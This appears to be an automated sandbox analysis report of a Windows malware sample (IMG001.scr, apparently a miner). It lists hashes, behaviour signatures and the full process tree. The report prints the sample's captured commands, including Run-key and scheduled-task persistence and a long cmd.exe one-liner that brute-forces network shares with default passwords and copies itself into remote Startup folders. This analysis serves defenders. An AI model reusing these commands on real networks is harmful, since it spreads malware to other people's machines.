Analysis
- max time kernel: 149s
- max time network: 144s
- platform: windows7_x64
- resource: win7v20210410
- submitted: 25-05-2021 14:04
- Static task: static1
- Behavioral task: behavioral1 (Sample: IMG001.scr, Resource: win7v20210410)
- Behavioral task: behavioral2 (Sample: IMG001.scr, Resource: win10v20210410)

General
- Target: IMG001.scr
- Size: 3.4MB
- MD5: fbbcf1e9501234d6661a0c9ae6dc01c9
- SHA1: 1ca9759a324159f331e79ea6871ad62040521b41
- SHA256: d9901b16a93aad709947524379d572a7a7bf8e2741e27a1112c95977d4a6ea8c
- SHA512: 027e5ea6d92955b87439f61704de5b3e21c7a8e0a95327868951968e4f5cbed59cf1e803ac9adb2c9cf577db7a2f6fd4383b7384d57a78596cfb2ff020907140
Malware Config
Signatures
- Executes dropped EXE (1 IoC)
  Processes (pid, process):
    316  IMG001.exe
- Drops startup file (1 IoC)
  Processes (description, ioc, process):
    File created: C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Run.lnk  (IMG001.exe)
- Loads dropped DLL (7 IoCs)
  Processes (pid, process):
    1756  IMG001.scr
    316   IMG001.exe  (recorded 6 times)
- Adds Run key to start application (2 TTPs, 4 IoCs)
  Processes (description, ioc, process):
    Key created:     \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Windows\CurrentVersion\Run  (IMG001.exe)
    Set value (str): \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Windows\CurrentVersion\Run\ = "C:\\Users\\Admin\\AppData\\Roaming\\NsMiner\\IMG001.exe"  (IMG001.exe)
    Key created:     \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run  (reg.exe)
    Set value (str): \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\ = "C:\\Users\\Admin\\AppData\\Roaming\\NsMiner\\IMG001.exe"  (reg.exe)
- Enumerates connected drives (3 TTPs, 1 IoC)
  Attempts to read the root path of hard drives other than the default C: drive.
  Processes (description, ioc, process):
    File opened (read-only): \??\E:  (IMG001.exe)
- Drops file in Windows directory (1 IoC)
  Processes (description, ioc, process):
    File created: C:\Windows\Tasks\UAC.job  (schtasks.exe)
- Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
- NSIS installer (8 IoCs)
  Processes (resource, yara_rule):
    \Users\Admin\AppData\Roaming\NsMiner\IMG001.exe    nsis_installer_1, nsis_installer_2  (each rule matched twice)
    C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe  nsis_installer_1, nsis_installer_2  (each rule matched twice)
- Creates scheduled task(s) (1 TTP, 2 IoCs)
  Schtasks is often used by malware for persistence or to perform post-infection execution.
- Discovers systems in the same network (1 TTP, 2 IoCs)
- Enumerates system info in registry (2 TTPs, 12 IoCs)
  Processes (description, ioc, process):
    Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier  (xcopy.exe; 12 identical entries, one per xcopy.exe instance)
- NTFS ADS (2 IoCs)
  Processes (description, ioc, process):
    File created:                 C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe:P  (cmd.exe)
    File opened for modification: C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe:P  (cmd.exe)
- Runs net.exe
- Runs ping.exe (1 TTP, 2 IoCs)
- Suspicious use of AdjustPrivilegeToken (3 IoCs)
  Processes (description, pid, process):
    Token: SeShutdownPrivilege  1216  powercfg.exe
    Token: SeShutdownPrivilege  300   powercfg.exe
    Token: SeShutdownPrivilege  1320  powercfg.exe
- Suspicious use of WriteProcessMemory (64 IoCs)
  Processes (source pid/process -> target pid/process; each pair is recorded 4 times, 16 pairs in total):
    1756 IMG001.scr -> 316 IMG001.exe
    316 IMG001.exe -> 904 cmd.exe
    316 IMG001.exe -> 368 cmd.exe
    316 IMG001.exe -> 1512 cmd.exe
    316 IMG001.exe -> 812 cmd.exe
    904 cmd.exe -> 1768 reg.exe
    368 cmd.exe -> 1212 schtasks.exe
    1512 cmd.exe -> 308 schtasks.exe
    812 cmd.exe -> 1216 powercfg.exe
    812 cmd.exe -> 300 powercfg.exe
    812 cmd.exe -> 1320 powercfg.exe
    316 IMG001.exe -> 436 cmd.exe
    436 cmd.exe -> 752 cmd.exe
    752 cmd.exe -> 1380 net.exe
    752 cmd.exe -> 592 find.exe
    752 cmd.exe -> 2008 ARP.EXE
Processes
- [PID 1756] C:\Users\Admin\AppData\Local\Temp\IMG001.scr
  cmdline: "C:\Users\Admin\AppData\Local\Temp\IMG001.scr" /S
  signatures: Loads dropped DLL; Suspicious use of WriteProcessMemory
  - [PID 316] C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe
    cmdline: "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe"
    signatures: Executes dropped EXE; Drops startup file; Loads dropped DLL; Adds Run key to start application; Enumerates connected drives; Suspicious use of WriteProcessMemory
    - [PID 904] C:\Windows\SysWOW64\cmd.exe
      cmdline: "C:\Windows\system32\cmd.exe" /c reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "" /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" /t REG_SZ
      signatures: Suspicious use of WriteProcessMemory
      - [PID 1768] C:\Windows\SysWOW64\reg.exe
        cmdline: reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "" /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" /t REG_SZ
        signatures: Adds Run key to start application
    - [PID 368] C:\Windows\SysWOW64\cmd.exe
      cmdline: "C:\Windows\system32\cmd.exe" /c schtasks /create /tn "UAC" /SC ONLOGON /F /RL HIGHEST /TR "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe"
      signatures: Suspicious use of WriteProcessMemory
      - [PID 1212] C:\Windows\SysWOW64\schtasks.exe
        cmdline: schtasks /create /tn "UAC" /SC ONLOGON /F /RL HIGHEST /TR "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe"
        signatures: Creates scheduled task(s)
    - [PID 1512] C:\Windows\SysWOW64\cmd.exe
      cmdline: "C:\Windows\system32\cmd.exe" /c schtasks /create /tn "UAC" /RU "SYSTEM" /SC ONLOGON /F /V1 /RL HIGHEST /TR "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe"
      signatures: Suspicious use of WriteProcessMemory
      - [PID 308] C:\Windows\SysWOW64\schtasks.exe
        cmdline: schtasks /create /tn "UAC" /RU "SYSTEM" /SC ONLOGON /F /V1 /RL HIGHEST /TR "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe"
        signatures: Drops file in Windows directory; Creates scheduled task(s)
    - [PID 812] C:\Windows\SysWOW64\cmd.exe
      cmdline: "C:\Windows\system32\cmd.exe" /c powercfg /CHANGE -standby-timeout-ac 0 & powercfg /CHANGE -hibernate-timeout-ac 0 & Powercfg -SetAcValueIndex 381b4222-f694-41f0-9685-ff5bb260df2e 4f971e89-eebd-4455-a8de-9e59040e7347 5ca83367-6e45-459f-a27b-476b1d01c936 000
      signatures: Suspicious use of WriteProcessMemory
      - [PID 1216] C:\Windows\SysWOW64\powercfg.exe
        cmdline: powercfg /CHANGE -standby-timeout-ac 0
        signatures: Suspicious use of AdjustPrivilegeToken
      - [PID 300] C:\Windows\SysWOW64\powercfg.exe
        cmdline: powercfg /CHANGE -hibernate-timeout-ac 0
        signatures: Suspicious use of AdjustPrivilegeToken
      - [PID 1320] C:\Windows\SysWOW64\powercfg.exe
        cmdline: Powercfg -SetAcValueIndex 381b4222-f694-41f0-9685-ff5bb260df2e 4f971e89-eebd-4455-a8de-9e59040e7347 5ca83367-6e45-459f-a27b-476b1d01c936 000
        signatures: Suspicious use of AdjustPrivilegeToken
    - [PID 436] C:\Windows\SysWOW64\cmd.exe
      cmdline: "C:\Windows\system32\cmd.exe" /v:on /c @(for /f "usebackq tokens=1" %i in (`@net view^|find /i "\\" ^|^| @arp -a^|find /i " 1"`) do @set str_!random!=%i)& @for /f "usebackq tokens=1* delims==" %j in (`set str_`) do @set s=%k& set s=!s:\\=!& set l=!s:-PC=!& set l=!l:-ПК=!& set f=IMG001.exe& set n=1702& @if not "!s!"=="%COMPUTERNAME%" @echo connect to \\!s! & (for /f "usebackq tokens=1" %j in (`net view \\!s!^|find /i " "`) do @echo f|xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\!s!\%j\!f!" 1>nul && @echo copy to "\\!s!\%j\!f!") & @net use * /delete /y 2>nul & @(for %u in (1 !l! administrator user admin администратор) do @for %p in (0 1 123 %u !n! "") do @ping -n 3 localhost>nul & @(for %c in (\\!s!\C$ \\!s!\Users) do @echo connect to %c %p %u & @(if not "%p%u"=="01" net use %c "%p" /user:"%u") && @((echo [Section1] & echo p=%p %u)>"C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe:P" & @(for %d in ("%c\All Users\Microsoft\Windows\Start Menu\Programs\Startup\!f!" "%c\%u\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\!f!" "%c\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\!f!" "%c\Users\%u\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\!f!" "%c\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\!f!" "%c\Documents and Settings\%u\Start Menu\Programs\Startup\!f!" "%c\Documents and Settings\All Users\Start Menu\Programs\Startup\!f!" "%c\Documents and Settings\%u\Главное меню\Программы\Автозагрузка\!f!" "%c\Documents and Settings\All Users\Главное меню\Программы\Автозагрузка\!f!" "%c\Windows\Profiles\%u\Start Menu\Programs\Startup\!f!" "%c\Windows\All Users\Start menu\Programs\Startup\!f!" "%c\%u\!f!" ) do @echo f|@xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" %d 1>nul && @echo copy to %d) & @echo nul>"C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe:P" & net use %c /delete /y 2>nul & @ping -n 20 localhost>nul)))
      signatures: NTFS ADS; Suspicious use of WriteProcessMemory
      - [PID 752] C:\Windows\SysWOW64\cmd.exe
        cmdline: C:\Windows\system32\cmd.exe /c @net view|find /i "\\" || @arp -a|find /i " 1"
        signatures: Suspicious use of WriteProcessMemory
        - [PID 1380] C:\Windows\SysWOW64\net.exe
          cmdline: net view
          signatures: Discovers systems in the same network
        - [PID 592] C:\Windows\SysWOW64\find.exe
          cmdline: find /i "\\"
        - [PID 2008] C:\Windows\SysWOW64\ARP.EXE
          cmdline: arp -a
        - [PID 2036] C:\Windows\SysWOW64\find.exe
          cmdline: find /i " 1"
      - [PID 2032] C:\Windows\SysWOW64\cmd.exe
        cmdline: C:\Windows\system32\cmd.exe /c set str_
      - [PID 1156] C:\Windows\SysWOW64\cmd.exe
        cmdline: C:\Windows\system32\cmd.exe /c net view \\10.7.0.255|find /i " "
        - [PID 1660] C:\Windows\SysWOW64\net.exe
          cmdline: net view \\10.7.0.255
          signatures: Discovers systems in the same network
        - [PID 872] C:\Windows\SysWOW64\find.exe
          cmdline: find /i " "
      - [PID 1808] C:\Windows\SysWOW64\net.exe
        cmdline: net use * /delete /y
      - [PID 1980] C:\Windows\SysWOW64\PING.EXE
        cmdline: ping -n 3 localhost
        signatures: Runs ping.exe
      - [PID 1368] C:\Windows\SysWOW64\cmd.exe
        cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo f"
      - [PID 1336] C:\Windows\SysWOW64\cmd.exe
        cmdline: C:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.7.0.255\C$\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.7.0.255\C$\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" "
        - [PID 1068] C:\Windows\SysWOW64\xcopy.exe
          cmdline: xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.7.0.255\C$\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe"
          signatures: Enumerates system info in registry
      - [PID 1372] C:\Windows\SysWOW64\cmd.exe
        cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo f"
      - [PID 1824] C:\Windows\SysWOW64\cmd.exe
        cmdline: C:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.7.0.255\C$\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.7.0.255\C$\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" "
        - [PID 1364] C:\Windows\SysWOW64\xcopy.exe
          cmdline: xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.7.0.255\C$\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe"
          signatures: Enumerates system info in registry
      - [PID 1620] C:\Windows\SysWOW64\cmd.exe
        cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo f"
      - [PID 1852] C:\Windows\SysWOW64\cmd.exe
        cmdline: C:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.7.0.255\C$\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.7.0.255\C$\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" "
        - [PID 916] C:\Windows\SysWOW64\xcopy.exe
          cmdline: xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.7.0.255\C$\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe"
          signatures: Enumerates system info in registry
      - [PID 1764] C:\Windows\SysWOW64\cmd.exe
        cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo f"
      - [PID 608] C:\Windows\SysWOW64\cmd.exe
        cmdline: C:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.7.0.255\C$\Users\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.7.0.255\C$\Users\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" "
        - [PID 1532] C:\Windows\SysWOW64\xcopy.exe
          cmdline: xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.7.0.255\C$\Users\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe"
          signatures: Enumerates system info in registry
      - [PID 888] C:\Windows\SysWOW64\cmd.exe
        cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo f"
      - [PID 1112] C:\Windows\SysWOW64\cmd.exe
        cmdline: C:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.7.0.255\C$\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.7.0.255\C$\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" "
        - [PID 1324] C:\Windows\SysWOW64\xcopy.exe
          cmdline: xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.7.0.255\C$\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe"
          signatures: Enumerates system info in registry
      - [PID 1096] C:\Windows\SysWOW64\cmd.exe
        cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo f"
      - [PID 1684] C:\Windows\SysWOW64\cmd.exe
        cmdline: C:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.7.0.255\C$\Documents and Settings\1\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.7.0.255\C$\Documents and Settings\1\Start Menu\Programs\Startup\IMG001.exe" "
        - [PID 1076] C:\Windows\SysWOW64\xcopy.exe
          cmdline: xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.7.0.255\C$\Documents and Settings\1\Start Menu\Programs\Startup\IMG001.exe"
          signatures: Enumerates system info in registry
      - [PID 664] C:\Windows\SysWOW64\cmd.exe
        cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo f"
      - [PID 820] C:\Windows\SysWOW64\cmd.exe
        cmdline: C:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.7.0.255\C$\Documents and Settings\All Users\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.7.0.255\C$\Documents and Settings\All Users\Start Menu\Programs\Startup\IMG001.exe" "
        - [PID 1524] C:\Windows\SysWOW64\xcopy.exe
          cmdline: xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.7.0.255\C$\Documents and Settings\All Users\Start Menu\Programs\Startup\IMG001.exe"
          signatures: Enumerates system info in registry
      - [PID 1648] C:\Windows\SysWOW64\cmd.exe
        cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo f"
      - [PID 1432] C:\Windows\SysWOW64\cmd.exe
        cmdline: C:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.7.0.255\C$\Documents and Settings\1\Главное меню\Программы\Автозагрузка\IMG001.exe" 1>nul && @ echo copy to "\\10.7.0.255\C$\Documents and Settings\1\Главное меню\Программы\Автозагрузка\IMG001.exe" "
        - [PID 1964] C:\Windows\SysWOW64\xcopy.exe
          cmdline: xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.7.0.255\C$\Documents and Settings\1\Главное меню\Программы\Автозагрузка\IMG001.exe"
          signatures: Enumerates system info in registry
      - [PID 1380] C:\Windows\SysWOW64\cmd.exe
        cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo f"
      - [PID 1160] C:\Windows\SysWOW64\cmd.exe
        cmdline: C:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.7.0.255\C$\Documents and Settings\All Users\Главное меню\Программы\Автозагрузка\IMG001.exe" 1>nul && @ echo copy to "\\10.7.0.255\C$\Documents and Settings\All Users\Главное меню\Программы\Автозагрузка\IMG001.exe" "
        - [PID 1672] C:\Windows\SysWOW64\xcopy.exe
          cmdline: xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.7.0.255\C$\Documents and Settings\All Users\Главное меню\Программы\Автозагрузка\IMG001.exe"
          signatures: Enumerates system info in registry
      - [PID 2036] C:\Windows\SysWOW64\cmd.exe
        cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo f"
      - [PID 2012] C:\Windows\SysWOW64\cmd.exe
        cmdline: C:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.7.0.255\C$\Windows\Profiles\1\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.7.0.255\C$\Windows\Profiles\1\Start Menu\Programs\Startup\IMG001.exe" "
        - [PID 1052] C:\Windows\SysWOW64\xcopy.exe
          cmdline: xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.7.0.255\C$\Windows\Profiles\1\Start Menu\Programs\Startup\IMG001.exe"
          signatures: Enumerates system info in registry
      - [PID 1840] C:\Windows\SysWOW64\cmd.exe
        cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo f"
      - [PID 868] C:\Windows\SysWOW64\cmd.exe
        cmdline: C:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.7.0.255\C$\Windows\All Users\Start menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.7.0.255\C$\Windows\All Users\Start menu\Programs\Startup\IMG001.exe" "
        - [PID 1156] C:\Windows\SysWOW64\xcopy.exe
          cmdline: xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.7.0.255\C$\Windows\All Users\Start menu\Programs\Startup\IMG001.exe"
          signatures: Enumerates system info in registry
      - [PID 1644] C:\Windows\SysWOW64\cmd.exe
        cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo f"
      - [PID 1808] C:\Windows\SysWOW64\cmd.exe
        cmdline: C:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.7.0.255\C$\1\IMG001.exe" 1>nul && @ echo copy to "\\10.7.0.255\C$\1\IMG001.exe" "
        - [PID 1552] C:\Windows\SysWOW64\xcopy.exe
          cmdline: xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.7.0.255\C$\1\IMG001.exe"
          signatures: Enumerates system info in registry
      - [PID 1960] C:\Windows\SysWOW64\net.exe
        cmdline: net use \\10.7.0.255\C$ /delete /y
      - [PID 1844] C:\Windows\SysWOW64\PING.EXE
        cmdline: ping -n 20 localhost
        signatures: Runs ping.exe
Network
MITRE ATT&CK Enterprise v6
Downloads
- File 1 (hashes match the submitted sample)
  MD5: fbbcf1e9501234d6661a0c9ae6dc01c9
  SHA1: 1ca9759a324159f331e79ea6871ad62040521b41
  SHA256: d9901b16a93aad709947524379d572a7a7bf8e2741e27a1112c95977d4a6ea8c
  SHA512: 027e5ea6d92955b87439f61704de5b3e21c7a8e0a95327868951968e4f5cbed59cf1e803ac9adb2c9cf577db7a2f6fd4383b7384d57a78596cfb2ff020907140
- File 2
  MD5: d7a3fa6a6c738b4a3c40d5602af20b08
  SHA1: 34fc75d97f640609cb6cadb001da2cb2c0b3538a
  SHA256: 67eff17c53a78c8ec9a28f392b9bb93df3e74f96f6ecd87a333a482c36546b3e
  SHA512: 75cf123448567806be5f852ebf70f398da881e89994b82442a1f4bc6799894e799f979f5ab1cc9ba12617e48620e6c34f71e23259da498da37354e5fd3c0f934